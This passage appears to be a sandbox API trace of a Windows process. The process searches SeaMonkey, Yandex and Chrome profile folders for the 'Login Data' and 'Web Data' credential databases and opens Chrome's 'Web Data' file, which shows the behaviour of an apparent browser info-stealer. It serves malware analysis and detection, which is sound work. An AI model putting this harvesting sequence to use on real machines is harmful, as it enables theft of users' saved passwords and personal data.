yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\" [0087.748] wcscat (in: _Dest=0x28a2dc, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\*.*" [0087.748] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\*.*", lpFindFileData=0x28a564 | out: lpFindFileData=0x28a564) returned 0xffffffff [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey") returned 0x3a [0087.748] wcslen (_String="profiles.ini") returned 0xc [0087.748] wcscpy (in: _Dest=0x28a28c, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey" [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey") returned 0x3a [0087.749] wcscat (in: _Dest=0x28a28c, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\" [0087.749] wcscat (in: _Dest=0x28a28c, _Source="profiles.ini" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini" [0087.749] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\seamonkey\\profiles.ini")) returned 0xffffffff [0087.749] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\seamonkey.exe", ulOptions=0x0, samDesired=0x20019, phkResult=0x28b960 | out: phkResult=0x28b960*=0x0) returned 0x2 [0087.749] ExpandEnvironmentStringsW (in: lpSrc="%programfiles%\\Sea Monkey", lpDst=0x28cbb8, nSize=0x104 | out: lpDst="C:\\Program Files\\Sea Monkey") returned 0x1c [0087.749] wcslen (_String="C:\\Program Files\\Sea Monkey") returned 0x1b [0087.749] wcslen (_String="nss3.dll") returned 0x8 [0087.749] wcscpy (in: _Dest=0x28b758, _Source="C:\\Program Files\\Sea Monkey" | out: _Dest="C:\\Program Files\\Sea Monkey") returned="C:\\Program Files\\Sea Monkey" [0087.749] wcslen (_String="C:\\Program Files\\Sea Monkey") returned 0x1b [0087.749] wcscat (in: _Dest=0x28b758, _Source="\\" | out: _Dest="C:\\Program Files\\Sea Monkey\\") returned="C:\\Program Files\\Sea Monkey\\" [0087.749] wcscat (in: _Dest=0x28b758, _Source="nss3.dll" | out: _Dest="C:\\Program Files\\Sea Monkey\\nss3.dll") returned="C:\\Program Files\\Sea Monkey\\nss3.dll" [0087.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Sea Monkey\\nss3.dll" (normalized: "c:\\program files\\sea monkey\\nss3.dll")) returned 0xffffffff [0087.749] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28c798, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 1 [0087.749] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0087.749] wcslen (_String="Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0x31 [0087.749] wcscpy (in: _Dest=0x28cbb8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" [0087.749] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0087.749] wcscat (in: _Dest=0x28cbb8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\" [0087.749] wcscat (in: _Dest=0x28cbb8, _Source="Yandex\\YandexBrowser\\User Data\\Default\\Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data" [0087.749] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\yandex\\yandexbrowser\\user data\\default\\login data")) returned 0xffffffff [0087.749] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28cbb8, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 1 [0087.749] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0087.749] wcslen (_String="Google\\Chrome\\User Data") returned 0x17 [0087.749] wcscpy (in: _Dest=0x28c9a8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" [0087.749] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0087.749] wcscat (in: _Dest=0x28c9a8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\" [0087.749] wcscat (in: _Dest=0x28c9a8, _Source="Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0087.749] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.749] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.750] wcslen (_String="*.*") returned 0x3 [0087.750] wcscpy (in: _Dest=0x28af7c, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0087.750] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.750] wcscat (in: _Dest=0x28af7c, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0087.750] wcscat (in: _Dest=0x28af7c, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0087.750] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 0x594e38 [0087.811] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.811] wcslen (_String=".") returned 0x1 [0087.811] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0087.811] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.811] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0087.811] wcscat (in: _Dest=0x28b454, _Source="." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\.") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\." [0087.811] wcscmp (_String1=".", _String2="..") returned -1 [0087.811] wcscmp (_String1=".", _String2=".") returned 0 [0087.811] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0087.822] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.822] wcslen (_String="..") returned 0x2 [0087.822] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0087.823] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.823] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0087.823] wcscat (in: _Dest=0x28b454, _Source=".." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\..") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\.." [0087.823] wcscmp (_String1="..", _String2="..") returned 0 [0087.823] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0087.823] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.823] wcslen (_String="CertificateTransparency") returned 0x17 [0087.823] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0087.823] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.823] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0087.823] wcscat (in: _Dest=0x28b454, _Source="CertificateTransparency" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" [0087.823] wcscmp (_String1="CertificateTransparency", _String2="..") returned 1 [0087.823] wcscmp (_String1="CertificateTransparency", _String2=".") returned 1 [0087.823] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 0x56 [0087.823] wcslen (_String="Web Data") returned 0x8 [0087.823] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" [0087.823] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 0x56 [0087.823] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\" [0087.823] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Web Data" [0087.823] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\web data")) returned 0xffffffff [0087.834] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 0x56 [0087.834] wcslen (_String="Login Data") returned 0xa [0087.834] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" [0087.834] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 0x56 [0087.834] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\" [0087.834] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Login Data" [0087.834] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\login data")) returned 0xffffffff [0087.834] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0087.834] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.834] wcslen (_String="Crashpad") returned 0x8 [0087.834] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0087.834] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.835] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0087.835] wcscat (in: _Dest=0x28b454, _Source="Crashpad" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0087.835] wcscmp (_String1="Crashpad", _String2="..") returned 1 [0087.835] wcscmp (_String1="Crashpad", _String2=".") returned 1 [0087.835] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 0x47 [0087.835] wcslen (_String="Web Data") returned 0x8 [0087.835] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0087.835] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 0x47 [0087.835] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0087.835] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Web Data" [0087.835] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\crashpad\\web data")) returned 0xffffffff [0087.835] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 0x47 [0087.835] wcslen (_String="Login Data") returned 0xa [0087.835] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0087.835] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 0x47 [0087.835] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0087.835] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Login Data" [0087.835] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\crashpad\\login data")) returned 0xffffffff [0087.835] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0087.835] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.835] wcslen (_String="Default") returned 0x7 [0087.835] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0087.835] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0087.835] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0087.835] wcscat (in: _Dest=0x28b454, _Source="Default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0087.835] wcscmp (_String1="Default", _String2="..") returned 1 [0087.835] wcscmp (_String1="Default", _String2=".") returned 1 [0087.835] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 0x46 [0087.835] wcslen (_String="Web Data") returned 0x8 [0087.835] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0087.835] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 0x46 [0087.835] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0087.835] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" [0087.836] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\web data")) returned 0x2020 [0088.015] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0088.015] CloseHandle (hObject=0x10c) returned 1 [0088.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", cchWideChar=-1, lpMultiByteStr=0x28a5f0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpUsedDefaultChar=0x0) returned 80 [0088.016] GetSystemInfo (in: lpSystemInfo=0x453d40 | out: lpSystemInfo=0x453d40*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.016] GetVersionExW (in: lpVersionInformation=0x288b74*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x69f248, dwMinorVersion=0x3300083b, dwBuildNumber=0x6a2fb8, dwPlatformId=0x3e0000, szCSDVersion="") | out: lpVersionInformation=0x288b74*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.016] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x28a5f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0088.016] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x28a5f0, cbMultiByte=-1, lpWideCharStr=0x3eb3f0, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 80 [0088.016] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0088.016] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", nBufferLength=0x53, lpBuffer=0x3eb498, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpFilePart=0x0) returned 0x4f [0088.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0088.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", cchWideChar=-1, lpMultiByteStr=0x3eb3f0, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpUsedDefaultChar=0x0) returned 80 [0088.016] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb558, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0088.016] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb558, cbMultiByte=-1, lpWideCharStr=0x3eb1d0, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 80 [0088.016] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0088.017] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb558, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0088.017] MultiByteToWideChar (in: 